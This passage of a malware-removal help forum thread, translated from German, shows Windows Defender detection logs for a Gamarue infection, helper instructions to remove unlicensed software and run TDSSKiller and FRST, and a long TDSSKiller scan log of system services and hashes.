Weitere Informationen: https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/Gamarue.gen!A&threatid=2147687831&enterprise=0
Name: Behavior:Win32/Gamarue.gen!A
ID: 2147687831
Schweregrad: Schwerwiegend
Kategorie: Verdächtiges Verhalten
Pfad: behavior:_pid:9480:52449625702704;process:_pid:9480,ProcessStart:131434931121431956
Erkennungsursprung: Unbekannt
Erkennungstyp: Konkret
Erkennungsquelle: Unbekannt
Benutzer:
Prozessname: C:\Windows\SysWOW64\msiexec.exe
Signaturversion: AV: 1.247.404.0, AS: 1.247.404.0, NIS: 117.2.0.0
Modulversion: AM: 1.1.13903.0, NIS: 2.1.13804.0"
Code:
Ebene Datum und Uhrzeit Quelle Ereignis-ID Aufgabenkategorie
Informationen 02.07.2017 20:19:10 Microsoft-Windows-Windows Defender 1117 Keine
"Von Windows Defender Antivirus wurden Maßnahmen ergriffen, um den Computer vor Schadsoftware oder anderer potenziell unerwünschter Software zu schützen.
Weitere Informationen: https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/Gamarue.gen!A&threatid=2147687831&enterprise=0
Name: Behavior:Win32/Gamarue.gen!A
ID: 2147687831
Schweregrad: Schwerwiegend
Kategorie: Verdächtiges Verhalten
Pfad: behavior:_pid:9480:52449625702704;process:_pid:9480,ProcessStart:131434931121431956
Erkennungsursprung: Unbekannt
Erkennungstyp: Konkret
Erkennungsquelle: Unbekannt
Benutzer: NT-AUTORITÄT\SYSTEM
Prozessname: C:\Windows\SysWOW64\msiexec.exe
Aktion: Quarantäne
Aktionsstatus: Starten Sie das Gerät neu, um das Entfernen von Schadsoftware und anderer potenziell unerwünschter Software abzuschließen.
Fehlercode: 0x00000000
Fehlerbeschreibung: Der Vorgang wurde erfolgreich beendet.
Signaturversion: AV: 1.247.404.0, AS: 1.247.404.0, NIS: 117.2.0.0
Modulversion: AM: 1.1.13903.0, NIS: 2.1.13804.0"
Code:
Ebene Datum und Uhrzeit Quelle Ereignis-ID Aufgabenkategorie
Informationen 02.07.2017 20:20:00 Microsoft-Windows-Windows Defender 1001 Keine
"Die Windows Defender Antivirus-Überprüfung wurde fertig gestellt.
Überprüfungs-ID: {21DA05A8-757D-4A97-B967-2101EC459B50}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: ararat-notebook\ararat
Überprüfungszeit: 0:01:14" |
03.07.2017, 08:47 | #4 |
/// TB-Senior | Windows 10 - Gamarue I am working on your thread and will get back to you as soon as possible with further instructions. Please note that all of my replies must first be approved by an instructor before I am allowed to post them here. This guarantees that you get help from a trained helper. Thank you for your patience.
__________________ To protect against female Trojans and femaleware, the Windows Defenderess is sufficient on an up-to-date Windows 10. |
03.07.2017, 16:20 | #5 |
| Windows 10 - Gamarue Hey Fragerin, thanks for your reply. Can I keep using my notebook, or should I for now only touch it to run scanners etc. and post the corresponding logs? Regards |
03.07.2017, 17:53 | #6 |
/// TB-Senior | Windows 10 - Gamarue I will risk answering here without instruction: if possible, you had better not use the notebook normally (especially online), and do not plug in any removable media that have not been connected to it before.
03.07.2017, 18:24 | #7 |
/// TB-Senior | Windows 10 - Gamarue My name is Ruth and I will help you clean up your system.
Step 1: Remove illegal software
In our forum only completely legal systems are cleaned, because anything else would amount to aiding illegal acts, and besides, cracks etc. are a source of malware. Therefore please first uninstall all paid Adobe products that you run on your system without payment and activation. Only then can we continue. And why do you have a PRO version of Windows? Is it paid for?
03.07.2017, 20:29 | #8 |
| Windows 10 - Gamarue Hello Ruth, thanks for your reply. I have understood everything and it is of course reasonable - the software has been removed. I bought Win 7 Pro in order to then upgrade to Win 10 for free in time, so it is paid for and everything is legal. Regards, Ararat |
04.07.2017, 20:14 | #9 |
/// TB-Senior | Windows 10 - Gamarue Step 1: Check for possible rootkits
Please download TDSSKiller.exe and save the file to the desktop.
Step 2: File info with FRST
Step 3: New FRST logs
04.07.2017, 20:49 | #10 |
| Windows 10 - Gamarue Hello Ruth, thanks for your reply. Step 1: Code:
21:35:13.0914 0x03b4 TDSS rootkit removing tool 3.1.0.15 Apr 18 2017 11:34:02
21:35:32.0713 0x03b4 ============================================================
21:35:32.0713 0x03b4 Current date / time: 2017/07/04 21:35:32.0713
21:35:32.0713 0x03b4 SystemInfo:
21:35:32.0713 0x03b4
21:35:32.0713 0x03b4 OS Version: 10.0.15063 ServicePack: 0.0
21:35:32.0713 0x03b4 Product type: Workstation
21:35:32.0713 0x03b4 ComputerName: ARARAT-NOTEBOOK
21:35:32.0713 0x03b4 UserName: ararat
21:35:32.0713 0x03b4 Windows directory: C:\WINDOWS
21:35:32.0713 0x03b4 System windows directory: C:\WINDOWS
21:35:32.0713 0x03b4 Running under WOW64
21:35:32.0713 0x03b4 Processor architecture: Intel x64
21:35:32.0713 0x03b4 Number of processors: 4
21:35:32.0713 0x03b4 Page size: 0x1000
21:35:32.0713 0x03b4 Boot type: Normal boot
21:35:32.0713 0x03b4 CodeIntegrityOptions = 0x00000001
21:35:32.0713 0x03b4 ============================================================
21:35:32.0792 0x03b4 KLMD registered as C:\WINDOWS\system32\drivers\63444692.sys
21:35:32.0792 0x03b4 KLMD ARK init status: drvProperties = 0xFFF00, osBuild = 15063.0, osProperties = 0x19
21:35:33.0620 0x03b4 System UUID: {8A6B71B3-A5AA-3998-4220-AD0D10461FEE}
21:35:34.0198 0x03b4 Drive \Device\Harddisk0\DR0 - Size: 0x3B9E656000 ( 238.47 Gb ), SectorSize: 0x200, Cylinders: 0x799A, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
21:35:34.0198 0x03b4 ============================================================
21:35:34.0198 0x03b4 \Device\Harddisk0\DR0:
21:35:34.0198 0x03b4 MBR partitions:
21:35:34.0198 0x03b4 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x32000
21:35:34.0198 0x03b4 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x32800, BlocksNum 0x1D9650BA
21:35:34.0198 0x03b4 ============================================================
21:35:34.0198 0x03b4 C: <-> \Device\Harddisk0\DR0\Partition2
21:35:34.0198 0x03b4
============================================================
21:35:34.0198 0x03b4 Initialize success
21:35:34.0198 0x03b4 ============================================================
21:36:49.0569 0x1ac0 ============================================================
21:36:49.0569 0x1ac0 Scan started
21:36:49.0569 0x1ac0 Mode: Manual; SigCheck; TDLFS;
21:36:49.0569 0x1ac0 ============================================================
21:36:49.0569 0x1ac0 KSN ping started
21:37:09.0645 0x1ac0 KSN ping finished: true
21:37:10.0114 0x1ac0 ================ Scan system memory ========================
21:37:10.0114 0x1ac0 System memory - ok
21:37:10.0114 0x1ac0 ================ Scan services =============================
0x1ac0 [ F97961FD74E83E3E96DB45B69B33B157, 5F77EEEBC9BCEE0C888541B2EF728490CDD6D72F60B29619D0BE58ECF11CD67D ] CodeMeter.exe C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe 21:37:13.0692 0x1ac0 CodeMeter.exe - ok 21:37:13.0708 0x1ac0 [ DFDAEDB857BC18764F0D8ECDCC3C1499, AE12E908BAF53C605A17A9FB1AFD6BFBEC75EBE45D893541281473C197C71FED ] CompositeBus C:\WINDOWS\System32\DriverStore\FileRepository\compositebus.inf_amd64_de4c68ea4fb1be53\CompositeBus.sys 21:37:13.0708 0x1ac0 CompositeBus - ok 21:37:13.0724 0x1ac0 COMSysApp - ok 21:37:13.0724 0x1ac0 [ 04532711732BE9DBC364E88E4A9EC18A, FCEB1F486E146A3FE7307397C1EB6760BFD8A327545F81C546F7134B08615B9E ] condrv C:\WINDOWS\system32\drivers\condrv.sys 21:37:13.0755 0x1ac0 condrv - ok 21:37:13.0786 0x1ac0 [ 605D4C2E374197FEA0D0BC9C41E5945A, 0E655CEBB86DECC76153776AA4B78B7B7457ABA899B3437F76A7BE09F08752BB ] CoreMessagingRegistrar C:\WINDOWS\system32\coremessaging.dll 21:37:13.0833 0x1ac0 CoreMessagingRegistrar - ok 21:37:13.0849 0x1ac0 [ 75C568E62A2BD89A869C34119A66D19B, 2954F25E511947728FE50AA76ACECE0B6952D1984301027F499E2F3DAAEB65D3 ] cphs C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe 21:37:13.0864 0x1ac0 cphs - ok 21:37:13.0864 0x1ac0 [ 1F7F1A15B807BC7B241BB2FEEA79BC92, D756E2247757C274F3470B46FCDBB63317C05E8E66FDA9DB7ABF3A6820933D4C ] CryptSvc C:\WINDOWS\system32\cryptsvc.dll 21:37:13.0895 0x1ac0 CryptSvc - ok 21:37:13.0895 0x1ac0 [ EFB2A77F0CD1B8A79899C1D37B01CA86, 9FA32E0853FA93513ACA2CD4203DE8BC22268ABCA4BBDB366307C106F4FD5917 ] CSC C:\WINDOWS\system32\drivers\csc.sys 21:37:13.0927 0x1ac0 CSC - ok 21:37:13.0942 0x1ac0 [ F010BDED808E86E1046F08865C11EDF2, 48FE0D176F7FA1F04685C0A1FD4FFB6464B6B88883D7D50E05C9C6C0636E895A ] CscService C:\WINDOWS\System32\cscsvc.dll 21:37:13.0974 0x1ac0 CscService - ok 21:37:13.0974 0x1ac0 [ F51953EC4B9AACD92A3B3CE66E05CEF4, D39C9696213F53F89209000F245AC178B342A84E46EE766B634BB8DB86A26BB8 ] dam C:\WINDOWS\system32\drivers\dam.sys 21:37:13.0989 0x1ac0 dam - ok 21:37:13.0989 0x1ac0 [ 
A1F58FFF448E4099297D6EE0641D4D0E, 47839789332AAF8861F7731BF2D3FBB5E0991EA0D0B457BB4C8C1784F76C73DC ] dbupdate C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe 21:37:14.0005 0x1ac0 dbupdate - ok 21:37:14.0005 0x1ac0 [ A1F58FFF448E4099297D6EE0641D4D0E, 47839789332AAF8861F7731BF2D3FBB5E0991EA0D0B457BB4C8C1784F76C73DC ] dbupdatem C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe 21:37:14.0020 0x1ac0 dbupdatem - ok 21:37:14.0020 0x1ac0 [ 8FC11CF02CDF8C958EACCD8CC6479BE6, 451DF418FE72716B4AE75F36D77810F66046ABE4E870504AE4052D53121A526E ] DbxSvc C:\WINDOWS\system32\DbxSvc.exe 21:37:14.0020 0x1ac0 DbxSvc - ok 21:37:14.0052 0x1ac0 [ 0E79A4C76CAAA0CFE9CA42C13E5AA086, C4D90EDA54216CC7897128D39517E4E18195BF28254796C6D0684E2C7DB90642 ] DcomLaunch C:\WINDOWS\system32\rpcss.dll 21:37:14.0099 0x1ac0 DcomLaunch - ok 21:37:14.0099 0x1ac0 [ 1175E107082287A58A756239F48E1A73, 0DB2017061D94FAC95CEBD7C4729E42018A92698D72CEE3EA412A9D14DB8D552 ] defragsvc C:\WINDOWS\System32\defragsvc.dll 21:37:14.0130 0x1ac0 defragsvc - ok 21:37:14.0145 0x1ac0 [ BBCAC50027D030E07EC7E5C36469FAFF, FEF39659F21D2AE676E4882FBAF5A881C534BB7EA26E5EFF9F7B5F8B952D6532 ] DeviceAssociationService C:\WINDOWS\system32\das.dll 21:37:14.0177 0x1ac0 DeviceAssociationService - ok 21:37:14.0177 0x1ac0 [ A2BACEBAC01BE7A6656B454E75C23262, C2C168718A341D48679AC4CA8005BD06E9F1F0D1F7C72D3C30A7A8CE1F665A43 ] DeviceInstall C:\WINDOWS\system32\umpnpmgr.dll 21:37:14.0192 0x1ac0 DeviceInstall - ok 21:37:14.0208 0x1ac0 [ 5B84093D490A6B060C8BE60BA52C876F, D34A854418A66529B18313A50E6D7EAB982611AD9AB0335245AE764FE0602C22 ] DevicesFlowUserSvc C:\WINDOWS\System32\DevicesFlowBroker.dll 21:37:14.0239 0x1ac0 DevicesFlowUserSvc - ok 21:37:14.0255 0x1ac0 [ F08F70BBD833BAA3BF0D5E500CBEE6CC, 8BB99E6D96CB8B25036549030986EC267C26BF1FC66E4EB00A3E41FE3BB5DE70 ] DevQueryBroker C:\WINDOWS\system32\DevQueryBroker.dll 21:37:14.0270 0x1ac0 DevQueryBroker - ok 21:37:14.0270 0x1ac0 [ 185A4519B7764F4DEF714D890A7A9FD2, 
9805D9DB42D11582583EA3F0FFEE9EF2B0C536DA99A9A3D3863B2669B1CC34A7 ] Dfsc C:\WINDOWS\system32\Drivers\dfsc.sys 21:37:14.0286 0x1ac0 Dfsc - ok 21:37:14.0302 0x1ac0 [ BC5188B3F35BB8070888441A2A740465, 05C18A3DC1BD96C6751E76DBF57C47E526A1F9DF5E013B20B69EA0159CD6CE56 ] Dhcp C:\WINDOWS\system32\dhcpcore.dll 21:37:14.0333 0x1ac0 Dhcp - ok 21:37:14.0333 0x1ac0 [ 5DF493C7954890EEC65CC2A21D479F76, 67087AAAC2AF93F265077AA392444E32DC299918A843A8AECFBE73636A5F2314 ] diagnosticshub.standardcollector.service C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe 21:37:14.0349 0x1ac0 diagnosticshub.standardcollector.service - ok 21:37:14.0395 0x1ac0 [ 3835D0DD7A932266CC0746FDC5EC5568, 9F0933698C94FB51960818D20DAF2EE7530EA77DCA6E30603EEE85B60D807891 ] DiagTrack C:\WINDOWS\system32\diagtrack.dll 21:37:14.0489 0x1ac0 DiagTrack - ok 21:37:14.0489 0x1ac0 [ 1203EA16F36C5BEB2509FB7CC03DC178, 195209CB711E5BDE24A50C88AA62F32E8AE26F6A83B423374FCA41444F55D1CE ] Disk C:\WINDOWS\system32\drivers\disk.sys 21:37:14.0505 0x1ac0 Disk - ok 21:37:14.0505 0x1ac0 [ 626E3564A7588139DE2367E14F8CAAB2, 472530B6DD70F4A5E61A8572B0479A6DF3BE8B4DD1E021BF00D05B3553927463 ] DmEnrollmentSvc C:\WINDOWS\system32\Windows.Internal.Management.dll 21:37:14.0552 0x1ac0 DmEnrollmentSvc - ok 21:37:14.0567 0x1ac0 [ 038B8B76284BC291EC75B005BB3EB13F, FE7BD7CF833C4A96ABF4FD6EBAB829CC4D8096780A22A313035D7E49BBA12D36 ] dmvsc C:\WINDOWS\System32\drivers\dmvsc.sys 21:37:14.0583 0x1ac0 dmvsc - ok 21:37:14.0583 0x1ac0 [ 32C76DFE2586EBECFFA4112E9196591C, 190C294F50B96B13D0B776F7C19DCB47EAACBEE999CBA50236CF8C856CF38B17 ] dmwappushservice C:\WINDOWS\system32\dmwappushsvc.dll 21:37:14.0599 0x1ac0 dmwappushservice - ok 21:37:14.0614 0x1ac0 [ FC3AA34608A69BDAC67E31FB70C8A720, 38815F527DF963B4A7D93895776DDD618BD29782B1FA74EB1A7319AE58739A06 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll 21:37:14.0630 0x1ac0 Dnscache - ok 21:37:14.0630 0x1ac0 [ F08CB37830A1F9950E8B2F7B1F78CC7E, 
E4E75645893597F6A02B98DC4F126A664F5DEF7B1CD4C2DEE5CA8ED18DB64C9C ] dot3svc C:\WINDOWS\System32\dot3svc.dll 21:37:14.0645 0x1ac0 dot3svc - ok 21:37:14.0661 0x1ac0 [ 3425E26D0A7792F2EE7745C0336C2062, 54A3AFFC31C2641BCE1877F2CBA61D2CD7191BA39FD5B3659491E4E307570C1E ] DPS C:\WINDOWS\system32\dps.dll 21:37:14.0677 0x1ac0 DPS - ok 21:37:14.0677 0x1ac0 [ 3D934A1C02EB6979CF45C70A71F580EC, 279B325E18ABF82FF523095D8D5958A3A48C7B7A4F64BD562DDED1D0662B608A ] drmkaud C:\WINDOWS\system32\DRIVERS\drmkaud.sys 21:37:14.0692 0x1ac0 drmkaud - ok 21:37:14.0692 0x1ac0 [ 5E92CB292D676634058E6C62653C9227, CE35C51B444664641306B4C2E21978B3418B58B2A973B19B908D86FE723FB4C4 ] DsmSvc C:\WINDOWS\System32\DeviceSetupManager.dll 21:37:14.0708 0x1ac0 DsmSvc - ok 21:37:14.0724 0x1ac0 [ E479C2656A3A47F5D4FAD10AE6EAED52, B17D18D5440CF131EEADA385989A8ED0DB7728CAAC4E745720947DD1BC4F9EF6 ] DsSvc C:\WINDOWS\System32\DsSvc.dll 21:37:14.0739 0x1ac0 DsSvc - ok 21:37:14.0755 0x1ac0 [ 682D7DF9704217DD8716307F9E2EEC05, A8D36414A7316C59995CF9689DD84B2FD3FECE47E39F515C81BC3C439890E993 ] DusmSvc C:\WINDOWS\System32\dusmsvc.dll 21:37:14.0802 0x1ac0 DusmSvc - ok 21:37:14.0849 0x1ac0 [ F5DFB6D800946ADE35C71BE9928098A9, 7B187EC9CCA233C16C9F98F9CFFB1A85A42FC79C652B26C8FED40890F11871F3 ] DXGKrnl C:\WINDOWS\System32\drivers\dxgkrnl.sys 21:37:14.0927 0x1ac0 DXGKrnl - ok 21:37:14.0942 0x1ac0 [ B3B6BE0C21B3CF9DA5FEE9E999B1F4A0, F660FA54D9282A1BF0AD22B7432F1EDC14C675C0B23653728B6A74256D0BAA6B ] e1dexpress C:\WINDOWS\system32\DRIVERS\e1d62x64.sys 21:37:15.0036 0x1ac0 e1dexpress - ok 21:37:15.0036 0x1ac0 [ ECA1628436628362856ACF239E6AFD29, 19051DC348918B863E0A272CF56891B8CB49E7E705B8BAC7663D36C797A7B962 ] EapHost C:\WINDOWS\System32\eapsvc.dll 21:37:15.0083 0x1ac0 EapHost - ok 21:37:15.0208 0x1ac0 [ D64CD3AE93125EDA383190C2AF607E70, 3D180B96C6A2318842FA03AE5F703320A93CF1F440FF7D0E6F6F9BAD98F2FA02 ] ebdrv C:\WINDOWS\system32\drivers\evbda.sys 21:37:15.0333 0x1ac0 ebdrv - ok 21:37:15.0333 0x1ac0 [ 
EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] EFS C:\WINDOWS\System32\lsass.exe 21:37:15.0349 0x1ac0 EFS - ok 21:37:15.0349 0x1ac0 [ FFBB37982E6D24AEC7A2E5459098EAC9, E89DD74540088ECAC9E802D7A059C0A6E3E5412BD42E5E9F26258724458EF8DB ] EhStorClass C:\WINDOWS\system32\drivers\EhStorClass.sys 21:37:15.0364 0x1ac0 EhStorClass - ok 21:37:15.0364 0x1ac0 [ ABF38D02E01D6ED87AE1DF65FC5DF62D, 57D48609DA30F60016D2ADEB9A772942FB39A117247EB63FAE3FCF50D726B698 ] EhStorTcgDrv C:\WINDOWS\system32\drivers\EhStorTcgDrv.sys 21:37:15.0380 0x1ac0 EhStorTcgDrv - ok 21:37:15.0380 0x1ac0 [ 5E4AB60D50F368A09275F4055D621EDC, C840F5DF3C0813EC6CB9BA0C3C91F2C6410227A6255DEF5FA94C8AC1E43E36A0 ] embeddedmode C:\WINDOWS\System32\embeddedmodesvc.dll 21:37:15.0395 0x1ac0 embeddedmode - ok 21:37:15.0395 0x1ac0 [ CA966CED8970A60FB00A3592564EF093, 4BD904032445235EE69DAA0024E0FB3D8B2325D897A683E334754EB3CA90AB39 ] EntAppSvc C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll 21:37:15.0427 0x1ac0 EntAppSvc - ok 21:37:15.0427 0x1ac0 [ B9A59B4AD516E38C39FA416398B96CCB, 4630A9AD414476B47F634F2EB5659597797222A8938B68847B97FECCE1A1B5F8 ] ErrDev C:\WINDOWS\System32\drivers\errdev.sys 21:37:15.0442 0x1ac0 ErrDev - ok 21:37:15.0458 0x1ac0 [ 1541374239F33512D7F4D24ED1E9238C, 8B1548D4052A72175EB6ADA9FD4286ACD5041E1CE071DCAC3760BB227FCD3621 ] EventSystem C:\WINDOWS\system32\es.dll 21:37:15.0489 0x1ac0 EventSystem - ok 21:37:15.0505 0x1ac0 [ 30FBA772B6963ADA4DE738FC8977611B, A8D3BFA43CE547765CDB475BC88E7153DA4A4215CC577EDFF8DA0AC1B025F654 ] EvtEng C:\Program Files\Intel\WiFi\bin\EvtEng.exe 21:37:15.0520 0x1ac0 EvtEng - ok 21:37:15.0520 0x1ac0 [ 9C4D88E8614487AD85A6F18A71A7298F, EE6F48C89D6379C7361484EAE7C7FAAA477D48032BFDD0D363E48642E62EADF4 ] exfat C:\WINDOWS\system32\drivers\exfat.sys 21:37:15.0552 0x1ac0 exfat - ok 21:37:15.0552 0x1ac0 [ C61014A176ECAAF97589E6FC979CE786, FB913AC647B68DB9854367BB1E53A504A85833966211279C8D7171698F743B27 ] fastfat 
C:\WINDOWS\system32\drivers\fastfat.sys 21:37:15.0567 0x1ac0 fastfat - ok 21:37:15.0583 0x1ac0 [ ECC5AEFEA31F1A078E954305B8CA6373, 15948D017E3B52D3B4BBEC047F963BD77247E24A59F0532B6A023B0C4159FC84 ] Fax C:\WINDOWS\system32\fxssvc.exe 21:37:15.0614 0x1ac0 Fax - ok 21:37:15.0614 0x1ac0 [ 853081957BA148F38FD8DE4390CFCF4A, 37C92C7ABA55A5FF7094F77F8EBEEE1F4BEE161CEC6B01A50FC0D0C39E36C142 ] fdc C:\WINDOWS\System32\drivers\fdc.sys 21:37:15.0630 0x1ac0 fdc - ok 21:37:15.0645 0x1ac0 [ 885C06C35CC8FAEDDE3CDA36B72CA2A9, FF6584E7AF2FB540B2183665C3E216BE98DE953CEA6A7E4C5F13514BE4AAC9D3 ] fdPHost C:\WINDOWS\system32\fdPHost.dll 21:37:15.0661 0x1ac0 fdPHost - ok 21:37:15.0661 0x1ac0 [ 367E878C79D9F391E3D53B6BBC1B6386, 739D89F6954E17B73F53702CFF8EE985FB241255D962A83BAF1A20E783CAF466 ] FDResPub C:\WINDOWS\system32\fdrespub.dll 21:37:15.0677 0x1ac0 FDResPub - ok 21:37:15.0677 0x1ac0 [ 514F6A0B83527DD6ACCC8B21A57B10E3, EA3D401E42D05BA39E5874513DFB895A086BECE4D69FC1AC12F85F326A435A4B ] fhsvc C:\WINDOWS\system32\fhsvc.dll 21:37:15.0692 0x1ac0 fhsvc - ok 21:37:15.0692 0x1ac0 [ 27E764D6460504B7271AFECE7A59FB76, A32B08142068BF042B3E47C0CA7F4FCFD07A37807B1B8DAAE614F3A132475D52 ] FileCrypt C:\WINDOWS\system32\drivers\filecrypt.sys 21:37:15.0708 0x1ac0 FileCrypt - ok 21:37:15.0708 0x1ac0 [ 3D6087F51110F3CC0DA89385354F8C5E, 49FF976C3391A257BCD4B048BF6D1273F8537005E32D65E5F272AF3294639F05 ] FileInfo C:\WINDOWS\system32\drivers\fileinfo.sys 21:37:15.0724 0x1ac0 FileInfo - ok 21:37:15.0724 0x1ac0 [ 057E95E53C38260C4EF49B3A077770CD, 7008E71663046FF1D91D9DC3570094561C812067E1CA07715A1D2E4F787207AE ] Filetrace C:\WINDOWS\system32\drivers\filetrace.sys 21:37:15.0739 0x1ac0 Filetrace - ok 21:37:15.0771 0x1ac0 [ 8645F91F40B8D022C9AC3DABDF360A6B, 4F83080B1273C92470EB90D80B32056C913240DCC9C4C50B7BE85254066D654D ] FlexNet Licensing Service 64 C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe 21:37:15.0833 0x1ac0 FlexNet Licensing Service 64 - ok 21:37:15.0833 
0x1ac0 [ 90B2983D8495C26345A1DC5F0C3BB07B, 50D834D40C27EEF5023556A77B13D3335789333E302A73DF221CD86D156FDEE9 ] flpydisk C:\WINDOWS\System32\drivers\flpydisk.sys 21:37:15.0849 0x1ac0 flpydisk - ok 21:37:15.0864 0x1ac0 [ A84261F75F490E45CFEDBA77EFE4F67E, 292BA04D8996140255E4B6105015C2A640890BEFB6C022E30E0D9CBF45D5F4DB ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys 21:37:15.0880 0x1ac0 FltMgr - ok 21:37:15.0880 0x1ac0 fmqwrnmc - ok 21:37:15.0927 0x1ac0 [ 4255A21E89EFEDD8488E3ED81A9F7993, CA918E83A204A38C022A8EF28ACBF4575CEA39EED04FC739C5AD9BC464FF1753 ] FontCache C:\WINDOWS\system32\FntCache.dll 21:37:16.0036 0x1ac0 FontCache - ok 21:37:16.0036 0x1ac0 [ B282011D13BBEEA0273DF33C5E776D55, B4AF068BBB09D0F546F5590FCDD745250CFD58DD3A8ABF5DC26670FA32D181FB ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe 21:37:16.0052 0x1ac0 FontCache3.0.0.0 - ok 21:37:16.0052 0x1ac0 [ 8E0A89C8BC29F4B066B1DA4B96A63609, 1F4ABEC209ECDCA20620C7D7DB0C407F8D1032D506259B11FEAF2A0C3E14B1A3 ] FrameServer C:\WINDOWS\system32\FrameServer.dll 21:37:16.0083 0x1ac0 FrameServer - ok 21:37:16.0099 0x1ac0 [ D2814848206DFC18EB8D3D069FAE703E, A62263CDF9261B692423473F4FF23B01AC864C05850BA5591EB9019906B4A08B ] FsDepends C:\WINDOWS\system32\drivers\FsDepends.sys 21:37:16.0099 0x1ac0 FsDepends - ok 21:37:16.0099 0x1ac0 [ AE7EDF845F41ACA3B74567C3CE20E987, 6159C227C85912B03D8C35A1EF91705AE6C1C23C7228D6FCC0A9529844798E1B ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys 21:37:16.0114 0x1ac0 Fs_Rec - ok 21:37:16.0130 0x1ac0 [ FF0699483185CE3B4E1144DF19AC5E97, 9BA0A2F04A1A51AFC3B830452AC75BE2D76300BAF1918BCF5AB60E4EB9888F0F ] fvevol C:\WINDOWS\system32\DRIVERS\fvevol.sys 21:37:16.0145 0x1ac0 fvevol - ok 21:37:16.0161 0x1ac0 [ 4616F61E24B3AEA6E0E4EA7D69531EF4, 34CB16F68E4A4D19346C7FEC29BB5FE09BAAEC19EA730C9B93450F940D124D49 ] gencounter C:\WINDOWS\System32\drivers\vmgencounter.sys 21:37:16.0177 0x1ac0 gencounter - ok 21:37:16.0177 0x1ac0 [ 23174BB6937459B924BB8EF667FB28EF, 
6675B87F4DE9CCA96B6BAB9F77C4E0B377828613D9FFB03F7D443AF11321F157 ] genericusbfn C:\WINDOWS\System32\drivers\genericusbfn.sys 21:37:16.0192 0x1ac0 genericusbfn - ok 21:37:16.0192 0x1ac0 [ 4B11CFBE1D9B73A9D865F6AB26F800BA, BD76CB5AF0EE6DD404875A4C36622C6BC8CCF2975C47E28DD305EB041C6C0B91 ] GPIOClx0101 C:\WINDOWS\system32\Drivers\msgpioclx.sys 21:37:16.0208 0x1ac0 GPIOClx0101 - ok 21:37:16.0224 0x1ac0 [ CF22C0941409C772AA1568DC4F89A111, ED5895F024E64B672EB3FAE6C456FA0D30A068CF2B475A7EE988DEA4DCD6D8DE ] gpsvc C:\WINDOWS\System32\gpsvc.dll 21:37:16.0302 0x1ac0 gpsvc - ok 21:37:16.0317 0x1ac0 [ 3FC3FCF557D0BE3D724EA10642E1F6FF, 744D0DDE748A1B681087668CB893F9A60A2BBE80A71098944E75B6A9AA934C82 ] GpuEnergyDrv C:\WINDOWS\system32\drivers\gpuenergydrv.sys 21:37:16.0364 0x1ac0 GpuEnergyDrv - ok 21:37:16.0364 0x1ac0 [ DD1A6F4998E7E21564FA9BAFE21C87ED, CAD04E9B8244ACA3314C6FD4422BE7A3B578AF1E61F13773A2C5DB388B3337F6 ] HDAudBus C:\WINDOWS\System32\drivers\HDAudBus.sys 21:37:16.0380 0x1ac0 HDAudBus - ok 21:37:16.0396 0x1ac0 [ 9F90819E301C70A3A042FC05D3E41B5F, D2175786775D08686264001ABAA4B61DC08A847666F6B9A2A64D10BFC022F646 ] HidBatt C:\WINDOWS\System32\drivers\HidBatt.sys 21:37:16.0411 0x1ac0 HidBatt - ok 21:37:16.0411 0x1ac0 [ 3CA3244C45B25F3B3ED9445C195E40EB, 9C43B31DAB473D29069D0D6BC130660424FE2414BA519107641FA1561C10C76D ] HidBth C:\WINDOWS\System32\drivers\hidbth.sys 21:37:16.0427 0x1ac0 HidBth - ok 21:37:16.0442 0x1ac0 [ 55DAF856F9633DD2519BA4E942870F02, 5283548CB93EB46C5FD3B08E45C97BBFB33D47F11F89560508775889FBF2F754 ] hidi2c C:\WINDOWS\System32\drivers\hidi2c.sys 21:37:16.0458 0x1ac0 hidi2c - ok 21:37:16.0458 0x1ac0 [ E34216A190D9BF8EAA666F6903BCD0EF, DA8529DAF903B447CC5FF2D112F670696549A4B66F54DF9A8C8C615D969CD477 ] hidinterrupt C:\WINDOWS\System32\drivers\hidinterrupt.sys 21:37:16.0474 0x1ac0 hidinterrupt - ok 21:37:16.0474 0x1ac0 [ 852DBB5185996AD8C73872A43A453729, 8C20331AE99E280799407CC5FCF88F8F645C331604230876A2CD7C253B9BD633 ] HidIr 
C:\WINDOWS\System32\drivers\hidir.sys 21:37:16.0489 0x1ac0 HidIr - ok 21:37:16.0505 0x1ac0 [ 6339CC87F0F610D1575C9A419940602A, B2A054ED0B669FA54E250EC2926955B1D944FA1FB2AF5B590C181CB2E9D297BA ] hidserv C:\WINDOWS\system32\hidserv.dll 21:37:16.0521 0x1ac0 hidserv - ok 21:37:16.0521 0x1ac0 [ C1A608120DE0DF52E51B8BAF86AF19F9, F3529822E78CFCA2E323A75926A833529889E40BB9602B287CC343C496CB2062 ] HidUsb C:\WINDOWS\System32\drivers\hidusb.sys 21:37:16.0552 0x1ac0 HidUsb - ok 21:37:16.0552 0x1ac0 [ BD1CF47172B97707DFC66ADA741AE2BE, 9607AB7074FC54D88FDF6E2A31506BCF8ECBF8FD651BB5CEA2421471C24BCED1 ] HomeGroupListener C:\WINDOWS\system32\ListSvc.dll 21:37:16.0614 0x1ac0 HomeGroupListener - ok 21:37:16.0661 0x1ac0 [ A004895B838003BAE2281DAF193B6A09, 587FCDCEF769B2AED12551B6426477B764CB8A025E692D4EC8B24E1CBA1C06E3 ] HomeGroupProvider C:\WINDOWS\system32\provsvc.dll 